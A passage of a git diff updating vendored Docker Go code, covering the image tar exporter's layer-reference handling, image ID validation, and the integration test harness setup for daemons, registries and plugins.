 	"github.com/docker/docker/pkg/archive"
 	"github.com/docker/docker/pkg/system"
-	"github.com/docker/docker/reference"
+	"github.com/opencontainers/go-digest"
+	"github.com/pkg/errors"
 )
 
 type imageDescriptor struct {
-	refs   []reference.NamedTagged
-	layers []string
+	refs     []reference.NamedTagged
+	layers   []string
+	image    *image.Image
+	layerRef layer.Layer
 }
 
 type saveSession struct {
@@ -38,84 +43,147 @@ func (l *tarexporter) Save(names []string, outStream io.Writer) error {
 		return err
 	}
 
+	// Release all the image top layer references
+	defer l.releaseLayerReferences(images)
 	return (&saveSession{tarexporter: l, images: images}).save(outStream)
 }
 
-func (l *tarexporter) parseNames(names []string) (map[image.ID]*imageDescriptor, error) {
+// parseNames will parse the image names to a map which contains image.ID to *imageDescriptor.
+// Each imageDescriptor holds an image top layer reference named 'layerRef'. It is taken here, should be released later.
+func (l *tarexporter) parseNames(names []string) (desc map[image.ID]*imageDescriptor, rErr error) {
 	imgDescr := make(map[image.ID]*imageDescriptor)
+	defer func() {
+		if rErr != nil {
+			l.releaseLayerReferences(imgDescr)
+		}
+	}()
 
-	addAssoc := func(id image.ID, ref reference.Named) {
+	addAssoc := func(id image.ID, ref reference.Named) error {
 		if _, ok := imgDescr[id]; !ok {
-			imgDescr[id] = &imageDescriptor{}
+			descr := &imageDescriptor{}
+			if err := l.takeLayerReference(id, descr); err != nil {
+				return err
+			}
+			imgDescr[id] = descr
 		}
 
 		if ref != nil {
-			var tagged reference.NamedTagged
 			if _, ok := ref.(reference.Canonical); ok {
-				return
+				return nil
 			}
-			var ok bool
-			if tagged, ok = ref.(reference.NamedTagged); !ok {
-				var err error
-				if tagged, err = reference.WithTag(ref, reference.DefaultTag); err != nil {
-					return
-				}
+			tagged, ok := reference.TagNameOnly(ref).(reference.NamedTagged)
+			if !ok {
+				return nil
 			}
 
 			for _, t := range imgDescr[id].refs {
 				if tagged.String() == t.String() {
-					return
+					return nil
 				}
 			}
 			imgDescr[id].refs = append(imgDescr[id].refs, tagged)
 		}
+		return nil
 	}
 
 	for _, name := range names {
-		id, ref, err := reference.ParseIDOrReference(name)
+		ref, err := reference.ParseAnyReference(name)
 		if err != nil {
 			return nil, err
 		}
-		if id != "" {
-			_, err := l.is.Get(image.IDFromDigest(id))
-			if err != nil {
-				return nil, err
+		namedRef, ok := ref.(reference.Named)
+		if !ok {
+			// Check if digest ID reference
+			if digested, ok := ref.(reference.Digested); ok {
+				id := image.IDFromDigest(digested.Digest())
+				if err := addAssoc(id, nil); err != nil {
+					return nil, err
+				}
+				continue
 			}
-			addAssoc(image.IDFromDigest(id), nil)
-			continue
+			return nil, errors.Errorf("invalid reference: %v", name)
 		}
-		if ref.Name() == string(digest.Canonical) {
+
+		if reference.FamiliarName(namedRef) == string(digest.Canonical) {
 			imgID, err := l.is.Search(name)
 			if err != nil {
 				return nil, err
 			}
-			addAssoc(imgID, nil)
+			if err := addAssoc(imgID, nil); err != nil {
+				return nil, err
+			}
 			continue
 		}
-		if reference.IsNameOnly(ref) {
-			assocs := l.rs.ReferencesByName(ref)
+		if reference.IsNameOnly(namedRef) {
+			assocs := l.rs.ReferencesByName(namedRef)
 			for _, assoc := range assocs {
-				addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref)
+				if err := addAssoc(image.IDFromDigest(assoc.ID), assoc.Ref); err != nil {
+					return nil, err
+				}
 			}
 			if len(assocs) == 0 {
 				imgID, err := l.is.Search(name)
 				if err != nil {
 					return nil, err
 				}
-				addAssoc(imgID, nil)
+				if err := addAssoc(imgID, nil); err != nil {
+					return nil, err
+				}
 			}
 			continue
 		}
-		id, err = l.rs.Get(ref)
+		id, err := l.rs.Get(namedRef)
 		if err != nil {
 			return nil, err
 		}
-		addAssoc(image.IDFromDigest(id), ref)
+		if err := addAssoc(image.IDFromDigest(id), namedRef); err != nil {
+			return nil, err
+		}
 
 	}
 	return imgDescr, nil
 }
 
+// takeLayerReference will take/Get the image top layer reference
+func (l *tarexporter) takeLayerReference(id image.ID, imgDescr *imageDescriptor) error {
+	img, err := l.is.Get(id)
+	if err != nil {
+		return err
+	}
+	imgDescr.image = img
+	topLayerID := img.RootFS.ChainID()
+	if topLayerID == "" {
+		return nil
+	}
+	os := img.OS
+	if os == "" {
+		os = runtime.GOOS
+	}
+	if !system.IsOSSupported(os) {
+		return fmt.Errorf("os %q is not supported", os)
+	}
+	layer, err := l.lss[os].Get(topLayerID)
+	if err != nil {
+		return err
+	}
+	imgDescr.layerRef = layer
+	return nil
+}
+
+// releaseLayerReferences will release all the image top layer references
+func (l *tarexporter) releaseLayerReferences(imgDescr map[image.ID]*imageDescriptor) error {
+	for _, descr := range imgDescr {
+		if descr.layerRef != nil {
+			os := descr.image.OS
+			if os == "" {
+				os = runtime.GOOS
+			}
+			l.lss[os].Release(descr.layerRef)
+		}
+	}
+	return nil
+}
+
 func (s *saveSession) save(outStream io.Writer) error {
 	s.savedLayers = make(map[string]struct{})
 	s.diffIDPaths = make(map[layer.DiffID]string)
@@ -143,15 +211,20 @@ func (s *saveSession) save(outStream io.Writer) error {
 		var layers []string
 
 		for _, ref := range imageDescr.refs {
-			if _, ok := reposLegacy[ref.Name()]; !ok {
-				reposLegacy[ref.Name()] = make(map[string]string)
+			familiarName := reference.FamiliarName(ref)
+			if _, ok := reposLegacy[familiarName]; !ok {
+				reposLegacy[familiarName] = make(map[string]string)
 			}
-			reposLegacy[ref.Name()][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1]
-			repoTags = append(repoTags, ref.String())
+			reposLegacy[familiarName][ref.Tag()] = imageDescr.layers[len(imageDescr.layers)-1]
+			repoTags = append(repoTags, reference.FamiliarString(ref))
 		}
 
 		for _, l := range imageDescr.layers {
-			layers = append(layers, filepath.Join(l, legacyLayerFileName))
+			// IMPORTANT: We use path, not filepath here to ensure the layers
+			// in the manifest use Unix-style forward-slashes. Otherwise, a
+			// Linux image saved from LCOW won't be able to be imported on
+			// LCOL.
+			layers = append(layers, path.Join(l, legacyLayerFileName))
 		}
 
 		manifest = append(manifest, manifestItem{
@@ -214,18 +287,12 @@ func (s *saveSession) save(outStream io.Writer) error {
 	}
 	defer fs.Close()
 
-	if _, err := io.Copy(outStream, fs); err != nil {
-		return err
-	}
-	return nil
+	_, err = io.Copy(outStream, fs)
+	return err
 }
 
 func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Descriptor, error) {
-	img, err := s.is.Get(id)
-	if err != nil {
-		return nil, err
-	}
-
+	img := s.images[id].image
 	if len(img.RootFS.DiffIDs) == 0 {
 		return nil, fmt.Errorf("empty export - not implemented")
 	}
@@ -235,7 +302,9 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc
 	var foreignSrcs map[layer.DiffID]distribution.Descriptor
 	for i := range img.RootFS.DiffIDs {
 		v1Img := image.V1Image{
-			Created: img.Created,
+			// This is for backward compatibility used for
+			// pre v1.9 docker.
+			Created: time.Unix(0, 0),
 		}
 		if i == len(img.RootFS.DiffIDs)-1 {
 			v1Img = img.V1Image
@@ -252,6 +321,7 @@ func (s *saveSession) saveImage(id image.ID) (map[layer.DiffID]distribution.Desc
 			v1Img.Parent = parent.Hex()
 		}
 
+		v1Img.OS = img.OS
 		src, err := s.saveLayer(rootFS.ChainID(), v1Img, img.Created)
 		if err != nil {
 			return nil, err
@@ -304,18 +374,24 @@ func (s *saveSession) saveLayer(id layer.ChainID, legacyImg image.V1Image, creat
 
 	// serialize filesystem
 	layerPath := filepath.Join(outDir, legacyLayerFileName)
-	l, err := s.ls.Get(id)
+	operatingSystem := legacyImg.OS
+	if operatingSystem == "" {
+		operatingSystem = runtime.GOOS
+	}
+	l, err := s.lss[operatingSystem].Get(id)
 	if err != nil {
 		return distribution.Descriptor{}, err
 	}
-	defer layer.ReleaseAndLog(s.ls, l)
+	defer layer.ReleaseAndLog(s.lss[operatingSystem], l)
 
 	if oldPath, exists := s.diffIDPaths[l.DiffID()]; exists {
 		relPath, err := filepath.Rel(outDir, oldPath)
 		if err != nil {
 			return distribution.Descriptor{}, err
 		}
-		os.Symlink(relPath, layerPath)
+		if err := os.Symlink(relPath, layerPath); err != nil {
+			return distribution.Descriptor{}, errors.Wrap(err, "error creating symlink while saving layer")
+		}
 	} else {
 		// Use system.CreateSequential rather than os.Create. This ensures sequential
 		// file access on Windows to avoid eating into MM standby list.
diff --git a/vendor/github.com/docker/docker/image/tarexport/tarexport.go b/vendor/github.com/docker/docker/image/tarexport/tarexport.go
index c0be95480e..beff668cd8 100644
--- a/vendor/github.com/docker/docker/image/tarexport/tarexport.go
+++ b/vendor/github.com/docker/docker/image/tarexport/tarexport.go
@@ -1,10 +1,10 @@
-package tarexport
+package tarexport // import "github.com/docker/docker/image/tarexport"
 
 import (
 	"github.com/docker/distribution"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
-	"github.com/docker/docker/reference"
+	refstore "github.com/docker/docker/reference"
 )
 
 const (
@@ -25,8 +25,8 @@ type manifestItem struct {
 
 type tarexporter struct {
 	is             image.Store
-	ls             layer.Store
-	rs             reference.Store
+	lss            map[string]layer.Store
+	rs             refstore.Store
 	loggerImgEvent LogImageEvent
 }
 
@@ -36,11 +36,11 @@ type LogImageEvent interface {
 	LogImageEvent(imageID, refName, action string)
 }
 
-// NewTarExporter returns new ImageExporter for tar packages
-func NewTarExporter(is image.Store, ls layer.Store, rs reference.Store, loggerImgEvent LogImageEvent) image.Exporter {
+// NewTarExporter returns new Exporter for tar packages
+func NewTarExporter(is image.Store, lss map[string]layer.Store, rs refstore.Store, loggerImgEvent LogImageEvent) image.Exporter {
 	return &tarexporter{
 		is:             is,
-		ls:             ls,
+		lss:            lss,
 		rs:             rs,
 		loggerImgEvent: loggerImgEvent,
 	}
diff --git a/vendor/github.com/docker/docker/image/v1/imagev1.go b/vendor/github.com/docker/docker/image/v1/imagev1.go
index d498ddbc00..c341ceaa77 100644
--- a/vendor/github.com/docker/docker/image/v1/imagev1.go
+++ b/vendor/github.com/docker/docker/image/v1/imagev1.go
@@ -1,21 +1,18 @@
-package v1
+package v1 // import "github.com/docker/docker/image/v1"
 
 import (
 	"encoding/json"
-	"fmt"
 	"reflect"
-	"regexp"
 	"strings"
 
-	"github.com/Sirupsen/logrus"
-	"github.com/docker/distribution/digest"
 	"github.com/docker/docker/api/types/versions"
 	"github.com/docker/docker/image"
 	"github.com/docker/docker/layer"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/opencontainers/go-digest"
+	"github.com/sirupsen/logrus"
 )
 
-var validHex = regexp.MustCompile(`^([a-f0-9]{64})$`)
-
 // noFallbackMinVersion is the minimum version for which v1compatibility
 // information will not be marshaled through the Image struct to remove
 // blank fields.
@@ -109,7 +106,7 @@ func MakeConfigFromV1Config(imageJSON []byte, rootfs *image.RootFS, history []im
 	return json.Marshal(c)
 }
 
-// MakeV1ConfigFromConfig creates an legacy V1 image config from an Image struct
+// MakeV1ConfigFromConfig creates a legacy V1 image config from an Image struct
 func MakeV1ConfigFromConfig(img *image.Image, v1ID, parentV1ID string, throwaway bool) ([]byte, error) {
 	// Top-level v1compatibility string should be a modified version of the
 	// image config.
@@ -149,8 +146,5 @@ func rawJSON(value interface{}) *json.RawMessage {
 
 // ValidateID checks whether an ID string is a valid image ID.
 func ValidateID(id string) error {
-	if ok := validHex.MatchString(id); !ok {
-		return fmt.Errorf("image ID %q is invalid", id)
-	}
-	return nil
+	return stringid.ValidateID(id)
 }
diff --git a/vendor/github.com/docker/docker/image/v1/imagev1_test.go b/vendor/github.com/docker/docker/image/v1/imagev1_test.go
index 936c55e4c5..45ae783d18 100644
--- a/vendor/github.com/docker/docker/image/v1/imagev1_test.go
+++ b/vendor/github.com/docker/docker/image/v1/imagev1_test.go
@@ -1,4 +1,4 @@
-package v1
+package v1 // import "github.com/docker/docker/image/v1"
 
 import (
 	"encoding/json"
diff --git a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go
index b87e131b7e..ae0f67f6b0 100644
--- a/vendor/github.com/docker/docker/integration-cli/benchmark_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/benchmark_test.go
@@ -8,7 +8,7 @@ import (
 	"strings"
 	"sync"
 
-	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/docker/docker/integration-cli/checker"
 	"github.com/go-check/check"
 )
 
diff --git a/vendor/github.com/docker/docker/integration-cli/check_test.go b/vendor/github.com/docker/docker/integration-cli/check_test.go
index 7084d6f8af..76b17627e7 100644
--- a/vendor/github.com/docker/docker/integration-cli/check_test.go
+++ b/vendor/github.com/docker/docker/integration-cli/check_test.go
@@ -1,32 +1,78 @@
 package main
 
 import (
+	"context"
 	"fmt"
+	"io/ioutil"
 	"net/http/httptest"
 	"os"
+	"path"
 	"path/filepath"
+	"strconv"
 	"sync"
 	"syscall"
 	"testing"
-
-	"github.com/docker/docker/api/types/swarm"
-	"github.com/docker/docker/cliconfig"
+	"time"
+
+	"github.com/docker/docker/integration-cli/checker"
+	"github.com/docker/docker/integration-cli/cli"
+	"github.com/docker/docker/integration-cli/daemon"
+	"github.com/docker/docker/integration-cli/environment"
+	testdaemon "github.com/docker/docker/internal/test/daemon"
+	ienv "github.com/docker/docker/internal/test/environment"
+	"github.com/docker/docker/internal/test/fakestorage"
+	"github.com/docker/docker/internal/test/fixtures/plugin"
+	"github.com/docker/docker/internal/test/registry"
 	"github.com/docker/docker/pkg/reexec"
 	"github.com/go-check/check"
 )
 
-func Test(t *testing.T) {
+const (
+	// the private registry to use for tests
+	privateRegistryURL = registry.DefaultURL
+
+	// path to containerd's ctr binary
+	ctrBinary = "docker-containerd-ctr"
+
+	// the docker daemon binary to use
+	dockerdBinary = "dockerd"
+)
+
+var (
+	testEnv *environment.Execution
+
+	// the docker client binary to use
+	dockerBinary = ""
+)
+
+func init() {
+	var err error
+
 	reexec.Init() // This is required for external graphdriver tests
 
-	if !isLocalDaemon {
-		fmt.Println("INFO: Testing against a remote daemon")
-	} else {
-		fmt.Println("INFO: Testing against a local daemon")
+	testEnv, err = environment.New()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
 	}
+}
 
-	if daemonPlatform == "linux" {
-		ensureFrozenImagesLinux(t)
+func TestMain(m *testing.M) {
+	dockerBinary = testEnv.DockerBinary()
+	err := ienv.EnsureFrozenImagesLinux(&testEnv.Execution)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
 	}
+
+	testEnv.Print()
+	os.Exit(m.Run())
+}
+
+func Test(t *testing.T) {
+	cli.SetTestEnvironment(testEnv)
+	fakestorage.SetTestEnvironment(&testEnv.Execution)
+	ienv.ProtectAll(t, &testEnv.Execution)
 	check.TestingT(t)
 }
 
@@ -38,18 +84,28 @@ type DockerSuite struct {
 }
 
 func (s *DockerSuite) OnTimeout(c *check.C) {
-	if daemonPid > 0 && isLocalDaemon {
-		signalDaemonDump(daemonPid)
+	if testEnv.IsRemoteDaemon() {
+		return
+	}
+	path := filepath.Join(os.Getenv("DEST"), "docker.pid")
+	b, err := ioutil.ReadFile(path)
+	if err != nil {
+		c.Fatalf("Failed to get daemon PID from %s\n", path)
+	}
+
+	rawPid, err := strconv.ParseInt(string(b), 10, 32)
+	if err != nil {
+		c.Fatalf("Failed to parse pid from %s: %s\n", path, err)
+	}
+
+	daemonPid := int(rawPid)
+	if daemonPid > 0 {
+		testdaemon.SignalDaemonDump(daemonPid)
 	}
 }
 
 func (s *DockerSuite) TearDownTest(c *check.C) {
-	unpauseAllContainers()
-	deleteAllContainers()
-	deleteAllImages()
-	deleteAllVolumes()
-	deleteAllNetworks()
-	deleteAllPlugins()
+	testEnv.Clean(c)
 }
 
 func init() {
@@ -60,8 +116,8 @@ func init() {
 
 type DockerRegistrySuite struct {
 	ds  *DockerSuite
-	reg *testRegistryV2
-	d   *Daemon
+	reg *registry.V2
+	d   *daemon.Daemon
 }
 
 func (s *DockerRegistrySuite) OnTimeout(c *check.C) {
@@ -69,9 +125,10 @@ func (s *DockerRegistrySuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerRegistrySuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux, RegistryHosting)
-	s.reg = setupRegistry(c, false, "", "")
-	s.d = NewDaemon(c)
+	testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon)
+	s.reg = registry.NewV2(c)
+	s.reg.WaitReady(c)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerRegistrySuite) TearDownTest(c *check.C) {
@@ -79,7 +136,7 @@ func (s *DockerRegistrySuite) TearDownTest(c *check.C) {
 		s.reg.Close()
 	}
 	if s.d != nil {
-		s.d.Stop()
+		s.d.Stop(c)
 	}
 	s.ds.TearDownTest(c)
 }
@@ -92,8 +149,8 @@ func init() {
 
 type DockerSchema1RegistrySuite struct {
 	ds  *DockerSuite
-	reg *testRegistryV2
-	d   *Daemon
+	reg *registry.V2
+	d   *daemon.Daemon
 }
 
 func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) {
@@ -101,9 +158,10 @@ func (s *DockerSchema1RegistrySuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerSchema1RegistrySuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64)
-	s.reg = setupRegistry(c, true, "", "")
-	s.d = NewDaemon(c)
+	testRequires(c, DaemonIsLinux, RegistryHosting, NotArm64, SameHostDaemon)
+	s.reg = registry.NewV2(c, registry.Schema1)
+	s.reg.WaitReady(c)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) {
@@ -111,7 +169,7 @@ func (s *DockerSchema1RegistrySuite) TearDownTest(c *check.C) {
 		s.reg.Close()
 	}
 	if s.d != nil {
-		s.d.Stop()
+		s.d.Stop(c)
 	}
 	s.ds.TearDownTest(c)
 }
@@ -124,8 +182,8 @@ func init() {
 
 type DockerRegistryAuthHtpasswdSuite struct {
 	ds  *DockerSuite
-	reg *testRegistryV2
-	d   *Daemon
+	reg *registry.V2
+	d   *daemon.Daemon
 }
 
 func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) {
@@ -133,9 +191,10 @@ func (s *DockerRegistryAuthHtpasswdSuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerRegistryAuthHtpasswdSuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux, RegistryHosting)
-	s.reg = setupRegistry(c, false, "htpasswd", "")
-	s.d = NewDaemon(c)
+	testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon)
+	s.reg = registry.NewV2(c, registry.Htpasswd)
+	s.reg.WaitReady(c)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) {
@@ -145,7 +204,7 @@ func (s *DockerRegistryAuthHtpasswdSuite) TearDownTest(c *check.C) {
 		s.reg.Close()
 	}
 	if s.d != nil {
-		s.d.Stop()
+		s.d.Stop(c)
 	}
 	s.ds.TearDownTest(c)
 }
@@ -158,8 +217,8 @@ func init() {
 
 type DockerRegistryAuthTokenSuite struct {
 	ds  *DockerSuite
-	reg *testRegistryV2
-	d   *Daemon
+	reg *registry.V2
+	d   *daemon.Daemon
 }
 
 func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) {
@@ -167,8 +226,8 @@ func (s *DockerRegistryAuthTokenSuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerRegistryAuthTokenSuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux, RegistryHosting)
-	s.d = NewDaemon(c)
+	testRequires(c, DaemonIsLinux, RegistryHosting, SameHostDaemon)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) {
@@ -178,7 +237,7 @@ func (s *DockerRegistryAuthTokenSuite) TearDownTest(c *check.C) {
 		s.reg.Close()
 	}
 	if s.d != nil {
-		s.d.Stop()
+		s.d.Stop(c)
 	}
 	s.ds.TearDownTest(c)
 }
@@ -187,7 +246,8 @@ func (s *DockerRegistryAuthTokenSuite) setupRegistryWithTokenService(c *check.C,
 	if s == nil {
 		c.Fatal("registry suite isn't initialized")
 	}
-	s.reg = setupRegistry(c, false, "token", tokenURL)
+	s.reg = registry.NewV2(c, registry.Token(tokenURL))
+	s.reg.WaitReady(c)
 }
 
 func init() {
@@ -198,7 +258,7 @@ func init() {
 
 type DockerDaemonSuite struct {
 	ds *DockerSuite
-	d  *Daemon
+	d  *daemon.Daemon
 }
 
 func (s *DockerDaemonSuite) OnTimeout(c *check.C) {
@@ -206,20 +266,20 @@ func (s *DockerDaemonSuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerDaemonSuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux)
-	s.d = NewDaemon(c)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
+	s.d = daemon.New(c, dockerBinary, dockerdBinary, testdaemon.WithEnvironment(testEnv.Execution))
 }
 
 func (s *DockerDaemonSuite) TearDownTest(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 	if s.d != nil {
-		s.d.Stop()
+		s.d.Stop(c)
 	}
 	s.ds.TearDownTest(c)
 }
 
 func (s *DockerDaemonSuite) TearDownSuite(c *check.C) {
-	filepath.Walk(daemonSockRoot, func(path string, fi os.FileInfo, err error) error {
+	filepath.Walk(testdaemon.SockRoot, func(path string, fi os.FileInfo, err error) error {
 		if err != nil {
 			// ignore errors here
 			// not cleaning up sockets is not really an error
@@ -230,7 +290,7 @@ func (s *DockerDaemonSuite) TearDownSuite(c *check.C) {
 		}
 		return nil
 	})
-	os.RemoveAll(daemonSockRoot)
+	os.RemoveAll(testdaemon.SockRoot)
 }
 
 const defaultSwarmPort = 2477
@@ -244,7 +304,7 @@ func init() {
 type DockerSwarmSuite struct {
 	server      *httptest.Server
 	ds          *DockerSuite
-	daemons     []*SwarmDaemon
+	daemons     []*daemon.Daemon
 	daemonsLock sync.Mutex // protect access to daemons
 	portIndex   int
 }
@@ -258,36 +318,22 @@ func (s *DockerSwarmSuite) OnTimeout(c *check.C) {
 }
 
 func (s *DockerSwarmSuite) SetUpTest(c *check.C) {
-	testRequires(c, DaemonIsLinux)
+	testRequires(c, DaemonIsLinux, SameHostDaemon)
 }
 
-func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *SwarmDaemon {
-	d := &SwarmDaemon{
-		Daemon: NewDaemon(c),
-		port:   defaultSwarmPort + s.portIndex,
-	}
-	d.listenAddr = fmt.Sprintf("0.0.0.0:%d", d.port)
-	args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} // avoid networking conflicts
-	if experimentalDaemon {
-		args = append(args, "--experimental")
-	}
-	err := d.StartWithBusybox(args...)
-	c.Assert(err, check.IsNil)
-
-	if joinSwarm == true {
+func (s *DockerSwarmSuite) AddDaemon(c *check.C, joinSwarm, manager bool) *daemon.Daemon {
+	d := daemon.New(c, dockerBinary, dockerdBinary,
+		testdaemon.WithEnvironment(testEnv.Execution),
+		testdaemon.WithSwarmPort(defaultSwarmPort+s.portIndex),
+	)
+	if joinSwarm {
 		if len(s.daemons) > 0 {
-			tokens := s.daemons[0].joinTokens(c)
-			token := tokens.Worker
-			if manager {
-				token = tokens.Manager
-			}
-			c.Assert(d.Join(swarm.JoinRequest{
-				RemoteAddrs: []string{s.daemons[0].listenAddr},
-				JoinToken:   token,
-			}), check.IsNil)
+			d.StartAndSwarmJoin(c, s.daemons[0].Daemon, manager)
 		} else {
-			c.Assert(d.Init(swarm.InitRequest{}), check.IsNil)
+			d.StartAndSwarmInit(c)
 		}
+	} else {
+		d.StartWithBusybox(c, "--iptables=false", "--swarm-default-advertise-addr=lo")
 	}
 
 	s.portIndex++
@@ -302,14 +348,10 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) {
 	testRequires(c, DaemonIsLinux)
 	s.daemonsLock.Lock()
 	for _, d := range s.daemons {
-		d.Stop()
-		// raft state file is quite big (64MB) so remove it after every test
-		walDir := filepath.Join(d.root, "swarm/raft/wal")
-		if err := os.RemoveAll(walDir); err != nil {
-			c.Logf("error removing %v: %v", walDir, err)
+		if d != nil {
+			d.Stop(c)
+			d.Cleanup(c)
 		}
-
-		cleanupExecRoot(c, d.execRoot)
 	}
 	s.daemons = nil
 	s.daemonsLock.Unlock()
@@ -319,65 +361,49 @@ func (s *DockerSwarmSuite) TearDownTest(c *check.C) {
 }
 
 func init() {
-	check.Suite(&DockerTrustSuite{
+	check.Suite(&DockerPluginSuite{
 		ds: &DockerSuite{},
 	})
 }
 
-type DockerTrustSuite struct {
-	ds  *DockerSuite
-	reg *testRegistryV2
-	not *testNotary
+type DockerPluginSuite struct {
+	ds       *DockerSuite
+	registry *registry.V2
 }
 
-func (s *DockerTrustSuite) SetUpTest(c *check.C) {
-	testRequires(c, RegistryHosting, NotaryServerHosting)
-	s.reg = setupRegistry(c, false, "", "")
-	s.not = setupNotary(c)
+func (ps *DockerPluginSuite) registryHost() string {
+	return privateRegistryURL
 }
 
-func (s *DockerTrustSuite) TearDownTest(c *check.C) {
-	if s.reg != nil {
-		s.reg.Close()
-	}
-	if s.not != nil {
-		s.not.Close()
-	}
-
-	// Remove trusted keys and metadata after test
-	os.RemoveAll(filepath.Join(cliconfig.ConfigDir(), "trust"))
-	s.ds.TearDownTest(c)
+func (ps *DockerPluginSuite) getPluginRepo() string {
+	return path.Join(ps.registryHost(), "plugin", "basic")
 }
-
-func init() {
-	ds := &DockerSuite{}
-	check.Suite(&DockerTrustedSwarmSuite{
-		trustSuite: DockerTrustSuite{
-			ds: ds,
-		},
-		swarmSuite: DockerSwarmSuite{
-			ds: ds,
-		},
-	})
+func (ps *DockerPluginSuite) getPluginRepoWithTag() string {
+	return ps.getPluginRepo() + ":" + "latest"
 }
 
-type DockerTrustedSwarmSuite struct {
-	swarmSuite DockerSwarmSuite
-	trustSuite DockerTrustSuite
-	reg        *testRegistryV2
-	not        *testNotary
+func (ps *DockerPluginSuite) SetUpSuite(c *check.C) {
+	testRequires(c, DaemonIsLinux, RegistryHosting)
+	ps.registry = registry.NewV2(c)
+	ps.registry.WaitReady(c)
+
+	ctx, cancel := context.WithTimeout(context.Background(), 60*time.Second)
+	defer cancel()
+
+	err := plugin.CreateInRegistry(ctx, ps.getPluginRepo(), nil)
+	c.Assert(err, checker.IsNil, check.Commentf("failed to create plugin"))
 }
 
-func (s *DockerTrustedSwarmSuite) SetUpTest(c *check.C) {
-	s.swarmSuite.SetUpTest(c)
-	s.trustSuite.SetUpTest(c)
+func (ps *DockerPluginSuite) TearDownSuite(c *check.C) {
+	if ps.registry != nil {
+		ps.registry.Close()
+	}
 }
 
-func (s *DockerTrustedSwarmSuite) TearDownTest(c *check.C) {
-	s.trustSuite.TearDownTest(c)
-	s.swarmSuite.TearDownTest(c)
+func (ps *DockerPluginSuite) TearDownTest(c *check.C) {
+	ps.ds.TearDownTest(c)
 }
 
-func (s *DockerTrustedSwarmSuite) OnTimeout(c *check.C) {
-	s.swarmSuite.OnTimeout(c)
+func (ps *DockerPluginSuite) OnTimeout(c *check.C) {
+	ps.ds.OnTimeout(c)
 }
diff --git a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go b/vendor/github.com/docker/docker/integration-cli/checker/checker.go
similarity index 95%
rename from vendor/github.com/docker/docker/pkg/integration/checker/checker.go
rename to vendor/github.com/docker/docker/integration-cli/checker/checker.go
index d1b703a599..d7fdc412ba 100644
--- a/vendor/github.com/docker/docker/pkg/integration/checker/checker.go
+++ b/vendor/github.com/docker/docker/integration-cli/checker/checker.go
@@ -1,5 +1,5 @@
 // Package checker provides Docker specific implementations of the go-check.Checker interface.
-package checker
+package checker // import "github.com/docker/docker/integration-cli/checker"
 
 import (
 	"github.com/go-check/check"
diff --git a/vendor/github.com/docker/docker/integration-cli/cli/build/build.go b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go
new file mode 100644
index 0000000000..0b10ea79f8
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/cli/build/build.go
@@ -0,0 +1,82 @@
+package build // import "github.com/docker/docker/integration-cli/cli/build"
+
+import (
+	"io"
+	"strings"
+
+	"github.com/docker/docker/internal/test/fakecontext"
+	"gotest.tools/icmd"
+)
+
+type testingT interface {
+	Fatal(args ...interface{})
+	Fatalf(string, ...interface{})
+}
+
+// WithStdinContext sets the build context from the standard input with the specified reader
+func WithStdinContext(closer io.ReadCloser) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append(cmd.Command, "-")
+		cmd.Stdin = closer
+		return func() {
+			// FIXME(vdemeester) we should not ignore the error here…
+			closer.Close()
+		}
+	}
+}
+
+// WithDockerfile creates / returns a CmdOperator to set the Dockerfile for a build operation
+func WithDockerfile(dockerfile string) func(*icmd.Cmd) func() {
+	return func(cmd *icmd.Cmd) func() {
+		cmd.Command = append(cmd.Command, "-")
+		cmd.Stdin = strings.NewReader(dockerfile)
+		return nil
+	}
+}
+
+// WithoutCache makes the build ignore cache
+func WithoutCache(cmd *icmd.Cmd) func() {
+	cmd.Command = append(cmd.Command, "--no-cache")
+	return nil
+}
+
+// WithContextPath sets the build context path
